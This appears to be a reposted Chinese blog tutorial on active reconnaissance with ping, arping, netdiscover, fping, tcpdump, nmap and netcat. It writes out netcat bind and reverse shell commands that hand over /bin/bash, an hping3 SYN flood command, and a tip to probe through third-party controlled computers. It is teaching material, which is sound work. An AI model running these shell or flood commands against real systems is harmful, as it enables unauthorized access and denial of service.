【安全】二,主动信息收集

这篇具有很好参考价值的文章主要介绍了【安全】二,主动信息收集。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

主动信息收集

  • 特点

    ​ 1,主动与目标网站/系统建立连接

    ​ 2,会在目标网站上留下痕迹

    ​ 3,会扫瞄发送不同的探测信息,根据返回的状态判断目标状态

    ​ 4,尽量的使用代理或者第三方的控制电脑进行探测,主动探测用力被封ip

  • 发现主机的过程

    ​ 1,识别存活的主机,发现攻击目标

    ​ 2,获取到存活主机的ip或者ip地址段

    ​ 3,使用二层,三层,四层进行探测发现(OSI七层模型:物理层,数据链路层,网络层,传输层【TCP,UDP】,会话层,表示层,应用层)

  • 主动信息收集方式

  • ping 命令

    ping baidu.com  --三层
    
    traceroute baidu.com  #路由跟踪,获取途径网络设备的ip地址
    
    • ARPING(主要针对内网,局域网)

    ARP就是把32位IP地址转换为48位的mac地址

    arp -a --查看缓存,跟本机有过通信的都会记录
    
    arping 10.211.55.2 --这个只能在内网ping,不能ping外网
    
    风险:ARP欺骗
    
    例如:有台电脑更改为网关的ip地址,在这时ping网关,会出现多个不同mac地址回应,出现这个情况可以抓包分析
    
    • 使用netdiscover探测局域网存活主机
    netdiscover -i eth0 -r 10.211.55.0/24 --主动方式,-i指定网卡, -r指定ip地址段, 意思是使用eth0网卡向10.211.55.这个网段发送ARP探测数据包,这个容易被发现
    
    netdiscover -p  --被动模式,所有访问本地的ip都会被监听到
    
    • 使用FPING查看局域网中运行那些机器
       --a显示存活主机,-g指定ip指定段,>重定向到fping.txt文件中,意思是,扫面当前网段所有存活的主机,并把所有存活的主机保存到fping.txt中
    
    • 使用tcpdump查看三次握手
      【安全】二,主动信息收集,安全,安全,网络
    -I 指定监听端口
    -c 指定要抓起的数据包数量
    -n 对ip地址已数字方式显示,否则显示为主机名
    port 指定端口
    
    tcpdump -n -c 3 port 22 -i eth0
    

    三次握手的数据包

    NMAP扫瞄–重点

    NMAP的核心功能是端口扫描

    • 参数说明

      -sn是Nmap的一个参数,用于执行Ping扫描而不进行端口扫描
      
      -sS:TCP SYN扫描,也称为半开放扫描,用于快速扫描大量主机。---不会留下痕迹
      
      -sT:TCP连接扫描,也称为全连接扫描,可以确定主机是否开放指定端口。----会留下痕迹
      
      -sU:UDP扫描,用于探测UDP端口是否开放。
      
      -Pn:不进行主机发现,直接对目标主机进行扫描。
      
      -p:指定要扫描的端口范围,如-p 1-100表示扫描1到100号端口。
      
      -O:启用操作系统检测功能,尝试识别目标主机的操作系统类型。
      
      -A:启用操作系统检测、版本检测、脚本扫描和Traceroute等功能。
      
      -v:增加详细程度,显示更多信息。
      
      -T:设置扫描速度,包括-T0(慢速)、-T3(默认速度)、-T4(快速)和-T5(最快)。
      
      --script:指定要运行的Nmap脚本,如--script=default
      
    • 使用

      nmap -sn 10.211.55.0/24
      nmap -sS 10.211.55.2 -p 80 443 3306
      

    nc工具扫描端口–瑞士军刀

    • 作用:

      1,实现任意的TCP/UDP的端口侦听,nc可以作为server以TCP/UDP的方式侦听指定端口
      2,端口扫描,nc可以作为client端发起TCP/UDP连接
      3,机器之间传输文件
      4,机器之间网络测速
      
    • 常见的参数说明

      -l:监听模式,用于在指定端口上监听连接。
      
      -p <port>:指定端口号,用于监听或连接。
      
      -e <command>:指定一个命令,当有连接建立时,将会执行该命令。
      
      -t:使用TCP协议。
      
      -u:使用UDP协议。
      
      -v:详细模式,显示更多调试信息。
      
      -h:显示帮助信息。
      
      -n参数表示不解析主机名
      
    • 使用

      nc -nv -w 1 -z 10.211.55.5 1-100  --这个命令将会扫描10.211.55.5主机的端口1到端口100,检查哪些端口是开放的。
      
      -nv: 使用详细模式 (-v), 并且不进行DNS解析 (-n)。
      -w 1: 设置超时时间为1秒,表示在1秒内没有完成连接则超时。
      -z: 表示进行端口扫描而不是建立实际的连接。
      10.211.55.5: 目标主机的IP地址。
      1-100: 要扫描的端口范围,从端口1到端口100。
      
    • nc 进行远程控制

      正向shell  攻击机连接目标机
      server端
      nc -lnvp 6666 -e /bin/bash
      
      client端
      nc -nv 10.211.55.6 6666
      
      说明:client端连接上server后,获取来server的shell,可以执行服务点的shll命令
      
      反向shell
      目标机连接攻击机,在公网中,如果目标机访问不到你,就不能反弹shell
      
      nc 10.211.55.8 4444 -e /bin/shell  注意ip地址是攻击机的ip,目标机反弹shell
      
      nc -lvvp 4444 #攻击机监听4444端口
      

    SYN洪水攻击

    SYN的红石工具来源于TCP三次握手

    过程:文章来源地址https://www.toymoban.com/news/detail-841432.html

    在服务端返回一个确认的syn-ack包的时候有个潜在的弊端,如果发起的客户是一个不存在的和客户端,那么服务端就不会接到客户端回应的ack确认确认报文,这个时候服务端需要耗费一定数量的系统内存来等待这个连接,直到等待超时,才会释放内存
    
    #实验命令,在内网使用及可,在外网使用一般不会成功
    hping3 -c 1000000000000 -d 120 -S -p 80 --flood --rand-source 10.211.55.8 
    


到了这里,关于【安全】二,主动信息收集的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全信息收集工具

    常用信息收集网址 站长之家: http://whois.chinaz.com Bugscaner: http://whois.bugscaner.com 国外在线: https://bgp.he.net 小蓝本: https://www.xiaolanben.com/pc 企查查: https://www.qichacha.com 天眼查: https://www.tianyancha.com 爱企查: https://aiqicha.baidu.com Amass: https://github.com/OWASP/Amass Subfinder: https://github.com/projec

    2024年01月22日
    浏览(43)
  • 网络安全之信息收集<五>

    信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进行。比如目标站点IP、中间件、脚本语言、端口、邮箱等。信息收集包含资产收集但不限于资产收集。 ①信息收集是渗透测试成功的保障; ②更多的暴露面; ③更大的可能性 (1)主动信息收集

    2024年02月21日
    浏览(44)
  • 网络安全-IP地址信息收集

    本文为作者学习文章,按作者习惯写成,如有错误或需要追加内容请留言(不喜勿喷) 本文为追加文章,后期慢慢追加 IP反查域名 http://stool.chinaz.com/same https://tools.ipip.net/ipdomain.php 如果渗透目标为虚拟主机,那么通过IP反查到的域名信息很有价值,因为一台物理服务器上面可

    2024年02月09日
    浏览(42)
  • 网络安全的信息收集方法有哪些?

    网络安全攻击中的信息收集是攻击者为了了解目标系统的弱点、配置、环境和潜在的防御措施而进行的活动。以下是一些常见的信息收集手段: 开放网络资源查询: 使用搜索引擎查找关于目标组织的信息,包括新闻稿、社交媒体帖子、官方网站等。 通过WHOIS查询获取域名注

    2024年01月22日
    浏览(45)
  • 网络安全进阶学习第八课——信息收集

    信息收集(Information Gathering)信息收集是指通过各种方式获取所需要的信息。渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。 目标资产信息搜集的程度,决定渗透过程的复杂程度。 目标主机信息搜集的深度,决定后渗透权限持续把控。 收集信

    2024年02月13日
    浏览(46)
  • 网络&信息安全:nginx漏洞收集(升级至最新版本)

    💖The Begin💖点点关注,收藏不迷路💖 漏洞名称: nginx 越界写入漏洞(CVE-2022-41742) 风险等级: 高 高可利用: 否 CVE编号: CVE-2022-41742 端口(服务): 8000(nginx) 风险描述: NGINX 在 ngx_http_mp4_module 中存在漏洞,这可能允许攻击者激发 worker 进程的崩溃,或者通过使用特制的 mp4 文

    2024年04月11日
    浏览(46)
  • 网络安全B模块(笔记详解)- Web信息收集

    1.通过Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,查看该命令的完整帮助文件),并将该操作使用命令中固定不变的字符串作为Flag提交; Flag:nikto -H 2.通过Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描目标服务器8080端口,检测其开放状态),

    2024年01月20日
    浏览(57)
  • 网络安全B模块(笔记详解)- MYSQL信息收集

    1.通过渗透机场景Kali中的渗透测试工具对服务器场景MySQL03进行服务信息扫描渗透测试(使用工具Nmap,使用必须要使用的参数),并将该操作显示结果中数据库版本信息作为Flag提交; Flag:MySQL 5.5.12 2.通过渗透机场景Kali中的渗透测试工具对服务器场景MySQL03的数据库进行暴力破

    2024年01月16日
    浏览(43)
  • 网络安全-信息收集- 谷歌浏览器插件收集信息,谷歌hacking搜索语法-带你玩不一样的搜索引擎

    推荐一个cloudss 可以购买国外的服务器做代理 代理文章发不出来因为违反规定 谷歌浏览器有个插件叫做switchsharp,可以自行搜索如何安装与使用,支持一件切换的 比如切换代理,方便某些功能的使用,也可以用来收集信息的哦~ wappalyzer 谷歌商店里面即可找到,就不出教程了

    2023年04月25日
    浏览(87)
  • 网络安全|渗透测试入门学习,从零基础入门到精通—收集信息篇

    目录 前面的话 1、收集域名信息 1.1、Whois查询 ​编辑1.2、备案信息查询  2、收集敏感信息 3、收集子域名信息 3.1、子域名检测工具 3.2、搜索引擎枚举 3.3、第三方聚合应用枚举 3.4、证书透明度公开日志枚举 本章小结 本人喜欢网络完全的一些知识,自学一些。现在写出来和大

    2024年02月08日
    浏览(51)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包